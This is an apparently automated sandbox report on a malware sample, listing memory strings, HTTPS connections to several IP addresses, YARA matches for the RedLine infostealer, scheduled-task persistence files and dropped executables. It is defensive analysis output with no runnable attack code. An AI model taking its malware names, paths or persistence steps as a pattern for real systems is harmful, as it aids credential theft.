                              Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/)P
                              Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
                              Source: 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account7
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountA
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086571979.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3085650788.0000000003780000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086442731.00000000037A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountL
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountM)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountT)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountd
                              Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountfmF(
                              Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountp
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50555
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _WINAPI_GETRAWINPUTDATAmemstr_3557b1e0-b

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Binary is likely a compiled AutoIt script file
                              Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4225168b-d
                              Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d6ec061c-0
                              Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_529da930-c
                              Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a690d9de-5
                              Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8b2b90e1-e
                              Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8a9ef8f4-3
                              PE file contains section with special chars
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name:
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .idata
                              Source: explorha.exe.0.drStatic PE information: section name:
                              Source: explorha.exe.0.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: .idata
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: .idata
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: .idata
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: .idata
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: .idata
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: .idata
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: .idata
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Windows\Tasks\explorha.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile created: C:\Windows\Tasks\chrosha.job
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B85DC80_2_00B85DC8
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BCA2200_2_00BCA220
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B84E600_2_00B84E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0074A2202_2_0074A220
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007443302_2_00744330
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007394E32_2_007394E3
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00748DBB2_2_00748DBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00704E602_2_00704E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007486692_2_00748669
